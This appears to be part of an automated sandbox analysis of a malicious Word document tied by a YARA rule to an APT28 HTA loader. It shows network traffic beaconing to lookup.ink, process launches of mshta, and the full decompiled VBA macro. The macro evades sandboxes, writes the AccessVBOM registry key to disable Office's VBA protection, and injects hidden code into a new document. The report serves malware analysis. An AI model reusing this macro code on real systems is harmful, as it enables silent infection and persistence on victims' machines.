              Data Raw: 33 39 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ac 56 8b 6e db 30 0c fc 25 ea 48 1d a5 cf 89 2d 7b 1f b0 ff 07 06 52 b6 e3 b4 dd d0 06 ab 91 a0 91 64 ea 78 3c 3e 7e 8f 3a c6 ae 9b ee bf ec d7 3e 7e db ce 0d 62 d5 e1 e0 ee 80 54 b0 ba 7a e5 60 85 d8 c6 ea cd 4d 86 3c 68 dc 79 ec 70 73 c3 46 67 75 b3 ca 95 d7 aa ab c1 7b 35 16 ba 6d 2c 69 a7 01 ae 2e 2c dc 00 74 34 15 74 6c ec 34 88 0e 08 c0 95 3b 77 2e 5e 5d 9e 67 e3 5e a3 57 6e 54 37 76 26 5e 36 85 6b ad d5 8c 5a 94 68 6c e8 71 56 fa 4f 3c 92 4e 63 71 63 b1 f0 60 a3 bb b1 4d 44 73 e5 c5 32 a7 3d 7a 5a ae 2e 06 56 3a 7b dc 18 ef 68 81 54 e3 0e f9 da 6e 0d 1f aa 0b 44 8f fb a5 7b a2 9b ef 1f ff 2f 10 53 36 47 75 34 53 5b c3 42 70 08 32 be 17 1b c9 5c 60 5b bf 44 b3 aa a1 c7 73 20 7f f5 f9 23 7b b7 bb 93 ef 40 6c 90 8f bc 7f 1d 0b 57 05 9b 3b 1a cb bc 0f 02 f9 49 14 f2 7c d8 1b 10 3e 2d 9c 6c f7 8f dc 5e 91 29 a7
              Data Ascii: 397Vn0%H-{Rdx<>~:>~bTz`M<hypsFgu{5m,i.,t4tl4;w.^]g^WnT7v&^6kZhlqVO<Ncqc`MDs2=zZ.V:{hTnD{/S6Gu4S[Bp2\`[Ds #{@lW;I|>-l^)
              Jan 13, 2025 21:38:36.116796970 CET  641 IN  Data Raw: 7f 71 fe c2 31 bd b9 7e 05 9b 15 ec 74 36 b7 60 51 25 1e 00 02 42 ac 05 12 34 2b ae d4 64 fc 64 b7 60 65 c7 aa 65 72 89 35 e2 76 f3 f1 e6 c3 bf 38 73 c4 5e ae a4 ef d3 1b 3d 70 e4 09 bb ed e0 be 53 83 31 84 3f a1 a6 b0 c3 92 99 b2 b1 be a5 f7 e6
              Data Ascii: q1~t6`Q%B4+dd`eer5v8s^=pS1?R#6]O*+8c4'c-qF&D`DfdUnpefVM|x9a%M;f_0RYd04N-WocwMi-^m-h'd
              Jan 13, 2025 21:38:36.136993885 CET  302 OUT  PUT /match.php HTTP/1.1
              Accept: */*
              Content-type: application/json
              User-Agent: 065367 user
              Accept-Language: en-ch
              UA-CPU: AMD64
              Accept-Encoding: gzip, deflate
              Host: lookup.ink
              Content-Length: 69
              Connection: Keep-Alive
              Cache-Control: no-cache
              Cookie: PHPSESSID=7e4lh6poe7tbuk6ln3pm7s17gv
              Jan 13, 2025 21:38:36.137190104 CET  69 OUT  Data Raw: 7b 22 6f 6c 61 6d 65 72 6a 64 61 73 22 3a 22 77 38 52 32 31 49 75 38 32 53 33 42 63 56 78 79 36 38 77 71 38 36 4f 4f 22 2c 22 78 79 71 6b 77 6f 6d 63 70 73 22 3a 22 30 36 35 33 36 37 20 47 61 6e 6a 69 22 7d
              Data Ascii: {"olamerjdas":"w8R21Iu82S3BcVxy68wq86OO","xyqkwomcps":"065367 user"}
              Jan 13, 2025 21:38:36.332978010 CET  833 IN  HTTP/1.1 200 OK
              Date: Mon, 13 Jan 2025 20:38:36 GMT
              Content-Type: text/html; charset=utf-8
              Transfer-Encoding: chunked
              Connection: keep-alive
              cf-cache-status: DYNAMIC
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cP4mTVri4obVNGlU%2B7H2qfHPyLdYKG772nqqOcyqv9bXCM9XuKyPfePBSvnVCa7rxknMpwpOKLzfy%2FqRh1Sdg6Q%2BMTxpWrlycgR18clqnv0IzJON2steS8TtdrwB"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 901830dc3b8d42b8-EWR
              Content-Encoding: gzip
              alt-svc: h3=":443"; ma=86400
              server-timing: cfL4;desc="?proto=TCP&rtt=1729&min_rtt=1552&rtt_var=455&sent=21&recv=17&lost=0&retrans=1&sent_bytes=5725&recv_bytes=2260&delivery_rate=1818181&cwnd=240&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
              Data Raw: 31 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 03 00 00 00 00 00 00 00 00 00 0d 0a
              Data Ascii: 14
              Jan 13, 2025 21:38:36.482795000 CET  5 IN  Data Raw: 30 0d 0a 0d 0a
              Data Ascii: 0
              Jan 13, 2025 21:39:02.161922932 CET  302 OUT  PUT /match.php HTTP/1.1
              Accept: */*
              Content-type: application/json
              User-Agent: 065367 user
              Accept-Language: en-ch
              UA-CPU: AMD64
              Accept-Encoding: gzip, deflate
              Host: lookup.ink
              Content-Length: 69
              Connection: Keep-Alive
              Cache-Control: no-cache
              Cookie: PHPSESSID=7e4lh6poe7tbuk6ln3pm7s17gv
              Jan 13, 2025 21:39:02.161922932 CET  69 OUT  Data Raw: 7b 22 6f 6c 61 6d 65 72 6a 64 61 73 22 3a 22 77 38 52 32 31 49 75 38 32 53 33 42 63 56 78 79 36 38 77 71 38 36 4f 4f 22 2c 22 78 79 71 6b 77 6f 6d 63 70 73 22 3a 22 30 36 35 33 36 37 20 47 61 6e 6a 69 22 7d
              Data Ascii: {"olamerjdas":"w8R21Iu82S3BcVxy68wq86OO","xyqkwomcps":"065367 user"}
              Jan 13, 2025 21:39:02.467547894 CET  839 IN  HTTP/1.1 200 OK
              Date: Mon, 13 Jan 2025 20:39:02 GMT
              Content-Type: text/html; charset=utf-8
              Transfer-Encoding: chunked
              Connection: keep-alive
              cf-cache-status: DYNAMIC
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GCsUZkZNkTOpiUdWQ5IyrOuXh8%2FwDUrtISMCJkHNt1UJgVMprkI96alok1gmE4MUiKbvz9aB4lANRcDcARqUelXxfJN697zRc4bxSQs8JGZmbhP1DBt3%2BSCuuuY%2B"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 9018317eebd242b8-EWR
              Content-Encoding: gzip
              alt-svc: h3=":443"; ma=86400
              server-timing: cfL4;desc="?proto=TCP&rtt=2063&min_rtt=1552&rtt_var=1008&sent=25&recv=20&lost=0&retrans=1&sent_bytes=6563&recv_bytes=2631&delivery_rate=1818181&cwnd=240&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
              Data Raw: 31 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 03 00 00 00 00 00 00 00 00 00 0d 0a 30 0d 0a 0d 0a
              Data Ascii: 140


              Target ID:0
              Start time:15:36:58
              Start date:13/01/2025
              Path:C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
              Wow64 process (32bit):false
              Commandline:"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /Automation -Embedding
              Imagebase:0x7ff63f440000
              File size:1'637'952 bytes
              MD5 hash:A9F0EC89897AC6C878D217DFB64CA752
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:moderate
              Has exited:false

              Target ID:7
              Start time:15:37:26
              Start date:13/01/2025
              Path:C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
              Wow64 process (32bit):false
              Commandline:"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /Automation -Embedding
              Imagebase:0x7ff63f440000
              File size:1'637'952 bytes
              MD5 hash:A9F0EC89897AC6C878D217DFB64CA752
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:moderate
              Has exited:true

              Target ID:9
              Start time:15:37:31
              Start date:13/01/2025
              Path:C:\Windows\System32\mshta.exe
              Wow64 process (32bit):false
              Commandline:"C:\Windows\System32\mshta.exe" C:\Users\user\AppData\Local\Lookup\Dispatch
              Imagebase:0x7ff64baa0000
              File size:32'768 bytes
              MD5 hash:36D15DDE6D71802D9588CC0D48EDF8EA
              Has elevated privileges:false
              Has administrator privileges:false
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: apt_susp_apt28_uac0063_hta_loader, Description: Detects some suspected APT28 HTA loader, Source: 00000009.00000002.2895883202.0000027C804F0000.00000004.00000800.00020000.00000000.sdmp, Author: Sekoia.io
              Reputation:moderate
              Has exited:false

              Call Graph

              Module: ThisDocument

              Declaration
              Line  Content
              1     Attribute VB_Name = "ThisDocument"
              2     Attribute VB_Base = "1Normal.ThisDocument"
              3     Attribute VB_GlobalNameSpace = False
              4     Attribute VB_Creatable = False
              5     Attribute VB_PredeclaredId = True
              6     Attribute VB_Exposed = True
              7     Attribute VB_TemplateDerived = True
              8     Attribute VB_Customizable = True
              9     Public objApp, wsl

              Function: documeNt_opEn@ThisDocument

              APIs
              API                        Meta Information
              Unprotect
              Shapes
              ActiveDocument
              Panes
              Delete
              Save
              Now
              Now
              TimeValue
              DoEvents
              Now
              TimeValue
              Part of subcall function verydanger@ThisDocument: CreateObject
              Part of subcall function verydanger@ThisDocument: RegWrite
              Part of subcall function verydanger@ThisDocument: Version
              Part of subcall function verydanger@ThisDocument: Application
              CreateObject               CreateObject("Word.Application") -> Microsoft Word
              Visible
              Documents
              Variables
              ActiveDocument
              Add
              Name
              AddFromString
              vbCrLf
              Part of subcall function danger@ThisDocument: Item
              ExpandEnvironmentStrings   IWshShell3.ExpandEnvironmentStrings("%localappdata%\Temp") -> C:\Users\Ganji\AppData\Local\Temp
              Name
              ActiveDocument
              SaveAs2
              Close
              Part of subcall function kokokokoko@ThisDocument: Open
              Part of subcall function kokokokoko@ThisDocument: Save
              Part of subcall function kokokokoko@ThisDocument: Close

              Strings
              Decrypted Strings
              "oikmseM#*inmowefj8349an3"
              "00:00:15"
              "Word.Application"
              "Sub goods() : : End Sub"
              "ThisDocument"
              "%localapp""data%\T""emp"

              Line  Instruction (Meta Information on the indented line that follows)
              24    Sub documeNt_opEn()
              25    On Error Resume Next
                    Meta: executed
              26    ActiveDocument.Unprotect ("oikmseM#*inmowefj8349an3")
                    Meta: Unprotect
              27    For i = ActiveDocument.Shapes.Count To ActiveDocument.Shapes.Count + 1 - ActiveDocument.ActiveWindow.Panes(1).Pages.Count * 2 Step - 1
                    Meta: Shapes, ActiveDocument, Panes
              28    ActiveDocument.Shapes(i).Delete
                    Meta: Delete
              29    Next i
                    Meta: Shapes, ActiveDocument, Panes
              30    ActiveDocument.Save
                    Meta: Save
              31    sss = Now()
                    Meta: Now
              32    While Now < sss + TimeValue("00:00:20")
                    Meta: Now, TimeValue
              33    DoEvents
                    Meta: DoEvents
              34    Wend
                    Meta: Now, TimeValue
              35    If Now() - sss < TimeValue("00:00:15") Then
                    Meta: Now, TimeValue
              35    Exit Sub
              35    Endif
              36    verydanger
              37    Set objApp = CreateObject("Word.Application")
                    Meta: CreateObject("Word.Application") -> Microsoft Word; executed
              38    objApp.Visible = False
                    Meta: Visible
              39    Set doc = objApp.Documents.Add
                    Meta: Documents
              40    For Each vars in ActiveDocument.Variables
                    Meta: Variables, ActiveDocument
              41    doc.Variables.Add vars.Name & "ergegdr", vars
                    Meta: Add, Name
              42    i = i + 1
              43    Next
                    Meta: Variables, ActiveDocument
              44    doc.VBProject.VBComponents("ThisDocument").CodeModule.AddFromString "Sub goods() : : End Sub" & vbCrLf & "Sub baads() : : End Sub" & vbCrLf & danger()
                    Meta: AddFromString, vbCrLf
              45    tmp = wsl.ExpandEnvironmentStrings("%localapp" & "data%\T" & "emp") & "\" & ActiveDocument.Name & ".doc"
                    Meta: IWshShell3.ExpandEnvironmentStrings("%localappdata%\Temp") -> C:\Users\Ganji\AppData\Local\Temp; Name, ActiveDocument; executed
              46    doc.SaveAs2 tmp, 13
                    Meta: SaveAs2
              47    doc.Close
                    Meta: Close
              48    kokokokoko (tmp)
              49    End Sub

              Function: kokokokoko@ThisDocument

              APIs
              API      Meta Information
              Open     Documents.Open("C:\Users\Ganji\AppData\Local\Temp\RoYAd85faz.doc.doc")
              Save
              Close

              Line  Instruction (Meta Information on the indented line that follows)
              13    Function kokokokoko(namedoc)
              14    Set doc2 = objApp.Documents.Open(namedoc)
                    Meta: Documents.Open("C:\Users\Ganji\AppData\Local\Temp\RoYAd85faz.doc.doc"); executed
              15    doc2.Save
                    Meta: Save
              16    doc2.Close
                    Meta: Close
              17    End Function

              Function: verydanger@ThisDocument

              APIs
              API            Meta Information
              CreateObject   CreateObject("WScript.Shell")
              RegWrite
              Version
              Application

              Strings
              Decrypted Strings
              "WSc""ript.She"
              "HK""CU\Softw""are\Micr""osoft\Of""fice\"
              "REG_D""WORD"

              Line  Instruction (Meta Information on the indented line that follows)
              18    Sub verydanger()
              19    strng = "WSc" & "ript.She"
                    Meta: executed
              20    strng = strng & "ll"
              21    Set wsl = CreateObject(strng)
                    Meta: CreateObject("WScript.Shell"); executed
              22    wsl.RegWrite "HK" & "CU\Softw" & "are\Micr" & "osoft\Of" & "fice\" & Application.Version & "\Wo" & "rd\Sec" & "urity\Acce" & "ssVBO" & "M", 1, "REG_D" & "WORD"
                    Meta: RegWrite, Version, Application
              23    End Sub

              Function: danger@ThisDocument

              APIs
              API    Meta Information
              Item

              Strings
              Decrypted Strings
              "s2"

              Line  Instruction (Meta Information on the indented line that follows)
              10    Function danger()
              11    danger = ActiveDocument.Variables.Item("s2")
                    Meta: Item; executed
              12    End Function
